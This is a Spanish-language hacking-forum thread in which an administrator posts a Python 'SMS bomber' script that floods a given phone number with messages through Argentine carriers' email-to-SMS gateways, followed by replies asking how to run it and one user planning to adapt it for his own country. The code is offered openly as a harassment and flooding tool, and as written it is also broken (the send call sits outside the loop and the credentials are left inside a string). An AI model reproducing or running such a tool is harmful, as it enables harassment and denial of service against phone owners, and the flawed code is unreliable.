comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Movistar, personal y claro bomber

  • 19 Respuestas
  • 4914 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5380
  • Actividad:
    75%
  • Reputación 31
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« en: Junio 10, 2010, 11:14:17 am »
Forma de uso:

doser.py 351478786 kaker "Hola" 400 m

Código: Python
  1. """
  2. #######RBOT##########
  3.  
  4. user =  'user@domain.com.ar'
  5. password = 'pas'
  6. smtpserv= 'smtp.domain.com.ar'
  7. """
  8.  
  9.  
  10. import smtplib
  11. import sys
  12.  
  13. if ((len(sys.argv))<6 or len(sys.argv)>6):
  14.         print "\r\nRbot sms dos movistar\r\n"
  15.         print "Usage: Numero sin 0 ni 15 - Nombre y Mensaje con comillas - cantidad de mensajes\r\n(longitud maxima 120 caracteres) - primera letra de la operadora (movistar(m) o personal(p))"
  16.         print 'Ej. Movistar: $python doser.py 351478786 kaker "Hola" 400 m \r\n'
  17.         print 'Ej. personal: $python doser.py 351778586 kaker "Hola" 400 p \r\n'
  18.         print 'Ej. Claro: $python doser.py 351778586 kaker "Hola" 400 c \r\n'
  19.         quit()
  20.  
  21. toaddres= sys.argv[1]
  22. nombre= sys.argv[2]
  23. mensaje= sys.argv[3]
  24. veces= int(sys.argv[4])
  25. operadora= sys.argv[5]
  26.  
  27. for i in range(veces):
  28.    
  29.        
  30.                 if (operadora == 'm'):
  31.                         addr= toaddres + '@sms.movistar.net.ar'
  32.                         msg = 'From: ' + user + '\r\n' + 'To: ' + addr + '\r\n\r\n' + mensaje + '\r\n' + "De: " + nombre
  33.                 elif(operadora == 'p'):
  34.                         addr= toaddres + '@personal-net.com.ar'
  35.                         msg = 'From: ' + user + '\r\n' + 'To: ' + addr + '\r\n\r\n' + mensaje + '\r\n' + "De: " + nombre
  36.                 else:
  37.                         addr= toaddres + '@sms.ctimovil.com.ar'
  38.                         msg = 'From: ' + user + '\r\n' + 'To: ' + addr + '\r\n\r\n' + mensaje + '\r\n' + "De: " + nombre
  39.        
  40.        
  41. print 'Longitud del mensaje es: ' + repr(len(mensaje)) + '\r\n'
  42. if (len(mensaje)>127):
  43.         print "Mensaje excede los 120 caracteres"
  44.         quit()
  45. else:
  46.         server = smtplib.SMTP(smtpserv)
  47.         server.login(user,password)
  48.         server.set_debuglevel(1)
  49.         server.sendmail(user, addr, msg)
  50.         server.quit()
  51.    

Creditos: rbot
« Última modificación: Mayo 01, 2014, 01:43:27 am por ANTRAX »


Desconectado 0A10

  • *
  • Underc0der
  • Mensajes: 68
  • Actividad:
    0%
  • Reputación 0
  • 0A10
    • Ver Perfil
« Respuesta #1 en: Junio 28, 2010, 04:28:11 pm »
Para qe sirve?? Salu2.

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5380
  • Actividad:
    75%
  • Reputación 31
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #2 en: Junio 28, 2010, 04:33:51 pm »
Envia sms masivos a un movil


303010

  • *
  • Visitante
« Respuesta #3 en: Junio 28, 2010, 04:34:43 pm »
Pero funca de verdad? es para VB ¿

Desconectado 0A10

  • *
  • Underc0der
  • Mensajes: 68
  • Actividad:
    0%
  • Reputación 0
  • 0A10
    • Ver Perfil
« Respuesta #4 en: Junio 28, 2010, 04:35:34 pm »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
Pero funca de verdad? es para VB ¿
Creo qe es para Python.

303010

  • *
  • Visitante
« Respuesta #5 en: Junio 28, 2010, 04:39:01 pm »
Citar
Creo qe es para Python.
Pero Python que es? un Lenguaje de Programacion ?¿
« Última modificación: Junio 28, 2010, 04:54:44 pm por ANTRAX »

Desconectado 0A10

  • *
  • Underc0der
  • Mensajes: 68
  • Actividad:
    0%
  • Reputación 0
  • 0A10
    • Ver Perfil
« Respuesta #6 en: Junio 28, 2010, 04:39:58 pm »
No tienes permisos para ver links. Registrate o Entra con tu cuenta

Creo qe es para Python.
[/quote]
Pero Python que es? un Lenguaje de Programacion ?¿
[/quote]
Si. No tienes permisos para ver links. Registrate o Entra con tu cuenta

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5380
  • Actividad:
    75%
  • Reputación 31
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #7 en: Junio 28, 2010, 04:55:29 pm »
Si es para python. Python es un lenguaje interpretado.
Bajate el Active python y haces el script ahi. Luego lo corres desde la consola


303010

  • *
  • Visitante
« Respuesta #8 en: Junio 28, 2010, 04:58:37 pm »
Gracias por la informacion 0A10 , intentare hacer algo con ese code, porq me intereza mucho este tema ^^

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5380
  • Actividad:
    75%
  • Reputación 31
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #9 en: Junio 28, 2010, 04:59:35 pm »
Python es un lenguaje muy facil de entender y aprender.
Te lo recomiendo, a demas de que es poderoso por la cantidad de cosas que se pueden hacer con el.
Es muy ordenado y la desventaja es que es un poco lento...


Desconectado 0A10

  • *
  • Underc0der
  • Mensajes: 68
  • Actividad:
    0%
  • Reputación 0
  • 0A10
    • Ver Perfil
« Respuesta #10 en: Junio 28, 2010, 05:05:07 pm »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
Python es un lenguaje muy facil de entender y aprender.
Te lo recomiendo, a demas de que es poderoso por la cantidad de cosas que se pueden hacer con el.
Es muy ordenado y la desventaja es que es un poco lento...
Seria mas rapido si fuese compilado, pero al ser interpretado es lo qe tiene.

303010

  • *
  • Visitante
« Respuesta #11 en: Junio 30, 2010, 12:33:51 am »
bueno me intereso este tema y creo que me pondre para el python

Desconectado ciscoh4x0r

  • *
  • Underc0der
  • Mensajes: 2
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #12 en: Agosto 25, 2010, 01:27:51 pm »
Se ve muy prometedor el código  ;D en seguida lo modifico para mi país y lo pruebo, a ver como me va y les comento. ;)

Desconectado abner

  • *
  • Underc0der
  • Mensajes: 6
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #13 en: Abril 15, 2011, 08:46:50 pm »
hola gente, una consulta, como ejecuto dicho scrip?? gracias

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5380
  • Actividad:
    75%
  • Reputación 31
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #14 en: Abril 16, 2011, 11:07:15 am »
Debes tener instalado el python en tu pc.
Guardalo como bomber.py
y desde la consola tipeas: python bomber.py
Y listo, ahi te pedira el numero de telefono, etc...


Desconectado abner

  • *
  • Underc0der
  • Mensajes: 6
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #15 en: Abril 16, 2011, 01:58:25 pm »
lo tengo instalado, pero no consigo ejecutarlo..., desde la consola de windows (cmd) busco la carpeta donde esta el archivo ejecuto el comando y dice q no reconoce el comando python, y desde el command line de python me sale el siguiente error; file "<stdin>", line 1 invalid syntax....
gracias x la ayuda

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5380
  • Actividad:
    75%
  • Reputación 31
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #16 en: Abril 16, 2011, 03:08:08 pm »
mmm... hay algo que estas haciendo mal...
Segui estos pasos:
1. descargate el ActivePython de su pagina oficial.
2. copia todo el script, pegalo en el bloc de notas y guardalo como doser.py
3. despues abri la consola de windows, ubicate en el directorio del script y escribi: python doser.py
Proba eso y me decis


Desconectado abner

  • *
  • Underc0der
  • Mensajes: 6
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #17 en: Abril 16, 2011, 06:53:08 pm »
antrax, esos son exactamente los pasos q hice, descargue el ActivePython de su pagina oficial, guarde el script como doser.py despues abri la consola de windows, me ubique en la carpeta donde esta el script, escribi python doser.py y me dice q python no es un comando valido...estoy usando win7, pero no creo q ese sea el problema...gracias

Desconectado Satyricon

  • *
  • Underc0der
  • Mensajes: 71
  • Actividad:
    0%
  • Reputación 0
  • ÐÎ$G®Ã©€ $ØLÐ΀®$ T€ÃM
    • Ver Perfil
    • Email
« Respuesta #18 en: Abril 17, 2011, 12:58:17 am »
Algo anda mal con el code, me paso lo mismo. No se mucho de python, pero me parece que viene por el tema de las url que plantea el code.

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5380
  • Actividad:
    75%
  • Reputación 31
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #19 en: Abril 17, 2011, 10:40:39 am »
:S a mi me va bien! Uso Win XP... a ver si alguien mas lo ha probado para ver que pasa..


 

¿Te gustó el post? COMPARTILO!



Mal filtrado de datos para clientes sin saldo en APN de Movistar Argentina?

Iniciado por q3rv0

Respuestas: 1
Vistas: 6117
Último mensaje Agosto 28, 2012, 11:43:45 am
por q3rv0